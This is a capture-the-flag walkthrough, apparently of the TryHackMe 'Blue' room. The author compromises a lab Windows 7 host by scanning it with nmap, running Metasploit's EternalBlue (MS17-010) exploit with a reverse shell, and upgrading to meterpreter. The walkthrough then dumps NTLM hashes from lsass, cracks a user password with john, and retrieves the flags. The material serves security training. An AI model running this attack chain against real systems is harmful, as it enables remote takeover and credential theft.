Blue
IP Address : 10.10.131.30
Recon
Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿kali)-[~]
└─# nmap 10.10.131.30
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 11:15 EDT
Nmap scan report for 10.10.131.30
Host is up (0.26s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49160/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 58.93 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~]
└─# nmap -sV -p 135,139,445,3389 10.10.131.30
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 11:17 EDT
Nmap scan report for 10.10.131.30
Host is up (0.28s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.28 seconds
How many ports are open with a port number under 1000?
3
What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
MS17-010
Gain Access
Exploit the machine and gain a foothold.
Start Metasploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(root㉿kali)-[~]
└─# msfconsole -q
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 3
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipe yes List of named pipes to check
s.txt
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_ms17_010) > setg RHOSTS 10.10.131.30
RHOSTS => 10.10.131.30
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.10.131.30:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.131.30:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
exploit/windows/smb/ms17_010_eternalblue
Show options and set the one required value. What is the name of this value? (All caps for submission)
RHOSTS
Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:
set payload windows/x64/shell/reverse_tcp
1
2
3
4
5
6
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.18.72.222
LHOST => 10.18.72.222
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.131.30 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target ma
chines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machin
es.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.18.72.222 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
With that done, run the exploit!
Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.18.72.222:4444
[*] 10.10.131.30:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.131.30:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.131.30:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.131.30:445 - The target is vulnerable.
[*] 10.10.131.30:445 - Connecting to target for exploitation.
[+] 10.10.131.30:445 - Connection established for exploitation.
[+] 10.10.131.30:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.131.30:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.131.30:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.131.30:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.131.30:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.131.30:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.131.30:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.131.30:445 - Sending all but last fragment of exploit packet
[*] 10.10.131.30:445 - Starting non-paged pool grooming
[+] 10.10.131.30:445 - Sending SMBv2 buffers
[+] 10.10.131.30:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.131.30:445 - Sending final SMBv2 buffers.
[*] 10.10.131.30:445 - Sending last fragment of exploit packet!
[*] 10.10.131.30:445 - Receiving response from exploit packet
[+] 10.10.131.30:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.131.30:445 - Sending egg to corrupted connection.
[*] 10.10.131.30:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.131.30
[*] Command shell session 1 opened (10.18.72.222:4444 -> 10.10.131.30:49170) at 2023-07-27 11:32:59 -0400
[+] 10.10.131.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.131.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.131.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeTcbPrivilege Act as part of the operating system Enabled
SeAuditPrivilege Generate security audits Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
C:\Windows\system32>^Z
Background session 1? [y/N] y
Escalate
Escalate privileges, learn how to upgrade shells in metasploit.
If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
post/multi/manage/shell_to_meterpreter
Select this (use MODULE_PATH). Show options, what option are we required to change?
SESSION
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Shell Banner: Microsoft Windows [Version 6.1.7601] ----- 10.18.72.222:4444 -> 10.10.131.30:49170 (10.10.131.30)
msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/manage/shell_to_meterpreter normal No Shell to Meterpreter Upgrade
Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter
msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on
View the full module info with the info, or info -d command.
msf6 post(multi/manage/shell_to_meterpreter) > set LHOST 10.18.72.222
LHOST => 10.18.72.222
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST 10.18.72.222 no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION 1 yes The session to run this module on
View the full module info with the info, or info -d command.
Set the required option, you may need to list all of the sessions to find your target here.
Run! If this doesn’t work, try completing the exploit from the previous task once more.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.18.72.222:4433
[*] Sending stage (200774 bytes) to 10.10.131.30
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > [*] Meterpreter session 2 opened (10.18.72.222:4433 -> 10.10.131.30:49191) at 2023-07-27 11:50:54 -0400
[*] Stopping exploit/multi/handler
msf6 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Shell Banner: Microsoft Windows [Version 6.1.7601] ----- 10.18.72.222:4444 -> 10.10.131.30:49170 (10.10.131.30)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.18.72.222:4433 -> 10.10.131.30:49191 (10.10.131.30)
Once the meterpreter shell conversion completes, select that session for use.
1
2
3
4
msf6 post(multi/manage/shell_to_meterpreter) > sessions 2
[*] Starting interaction with 2...
meterpreter >
Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
meterpreter > sysinfo
Computer : JON-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
[-] Already running as SYSTEM
meterpreter > shell
Process 2200 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>^Z
Background channel 1? [y/N] y
meterpreter >
List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
3044
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
540 532 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
548 684 svchost.exe x64 0 NT AUTHORITY\SYSTEM
588 532 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
600 580 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
604 816 WmiPrvSE.exe
640 580 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
684 588 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
712 588 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
720 588 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
760 684 svchost.exe x64 0 NT AUTHORITY\SYSTEM
816 684 svchost.exe x64 0 NT AUTHORITY\SYSTEM
884 684 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
936 684 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1000 640 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\LogonUI.exe
1124 684 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1212 684 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1304 816 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wbem\wmiprvse.exe
1344 684 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1380 684 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1428 548 Defrag.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\defrag.exe
1436 684 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1516 684 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\XenTools\LiteAgent.exe
1652 684 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
1996 684 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2104 540 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
2200 2328 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\cmd.exe
2204 540 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
2224 684 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2324 540 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
2328 2420 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2568 684 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM
2752 1344 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\cmd.exe
2760 540 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
2868 684 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2896 684 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2920 684 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2932 684 svchost.exe x64 0 NT AUTHORITY\SYSTEM
3044 684 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.
1
2
3
4
5
meterpreter > pgrep lsass
712
meterpreter > migrate 712
[*] Migrating from 2328 to 712...
[*] Migration completed successfully.
Cracking
Dump the non-default user’s password and crack it!
Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Jon
1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterpreter > sysinfo
Computer : JON-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Copy this password hash to a file and research how to crack it. What is the cracked password?
alqfna22
1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/tmp]
└─# john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt ntlm_hashes.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
(Administrator)
alqfna22 (Jon)
2g 0:00:00:00 DONE (2023-07-27 12:17) 5.128g/s 26154Kp/s 26154Kc/s 26167KC/s alqui..alpusidi
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
Find flags!
Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!
Flag1? This flag can be found at the system root.
1
2
3
meterpreter > cd C:\\
meterpreter > cat flag1.txt
flag{access_the_machine}
The Windows system root directory is the main folder where the Windows operating system and its essential files are installed. The location of the system root can vary depending on the version of Windows and the drive on which the operating system is installed.
By default, the Windows system root is usually located in the “C:\Windows” directory for most installations. In other words, on the “C:” drive, there is a folder named “Windows,” and this is where the core operating system files, system libraries, and configuration settings are stored.
For example, on a typical Windows installation, you might find the system root at the following path:
1
C:\Windows
It’s important to note that the actual location of the system root can be changed during the installation or by system administrators, but “C:\Windows” is the default and most common location.
Flag2? This flag can be found at the location where passwords are stored within Windows.
*Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.
“C:\Windows\System32\config
1
2
3
4
5
6
7
meterpreter > cd C:\\Windows\\System32\\Config
meterpreter > pwd
C:\Windows\System32\Config
meterpreter > ls flag2.txt
100666/rw-rw-rw- 34 fil 2019-03-17 15:32:48 -0400 flag2.txt
meterpreter > cat flag2.txt
flag{sam_database_elevated_access}
In Windows, passwords are stored in the Security Accounts Manager (SAM) database. The SAM database is a part of the Windows Registry and is located in the “C:\Windows\System32\config” directory. The SAM database contains hashed versions of user account passwords.
When a user sets or changes their password, Windows stores a one-way hash of the password in the SAM database. Hashing is a cryptographic process that converts the password into a fixed-length string of characters. The hashed password is not reversible, meaning it cannot be converted back into the original password directly.
For security reasons, the SAM database is protected from direct access by regular users and processes. Only privileged system processes and administrators have access to the SAM database.
To retrieve password hashes from the SAM database for password-cracking purposes, an attacker would typically need administrative privileges or exploit vulnerabilities to gain unauthorized access. Therefore, it’s crucial to protect the SAM database and the overall system from unauthorized access to prevent password theft and other security breaches.
flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
meterpreter > cd C:\\
meterpreter > cd Users\\
meterpreter > ls
Listing: C:\Users
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 All Users
040555/r-xr-xr-x 8192 dir 2009-07-14 03:07:31 -0400 Default
040777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 Default User
040777/rwxrwxrwx 8192 dir 2018-12-12 22:13:45 -0500 Jon
040555/r-xr-xr-x 4096 dir 2011-04-12 04:28:15 -0400 Public
100666/rw-rw-rw- 174 fil 2009-07-14 00:54:24 -0400 desktop.ini
meterpreter > cd Jon
meterpreter > search -f flag3.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Jon\Documents\flag3.txt 37 2019-03-17 15:26:36 -0400
meterpreter > pwd
C:\Users\Jon
meterpreter > cd Documents\\
meterpreter > pwd
C:\Users\Jon\Documents
meterpreter > ls
Listing: C:\Users\Jon\Documents
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2018-12-12 22:13:31 -0500 My Music
040777/rwxrwxrwx 0 dir 2018-12-12 22:13:31 -0500 My Pictures
040777/rwxrwxrwx 0 dir 2018-12-12 22:13:31 -0500 My Videos
100666/rw-rw-rw- 402 fil 2018-12-12 22:13:48 -0500 desktop.ini
100666/rw-rw-rw- 37 fil 2019-03-17 15:26:36 -0400 flag3.txt
meterpreter > cat flag3.txt
flag{admin_documents_can_be_valuable}
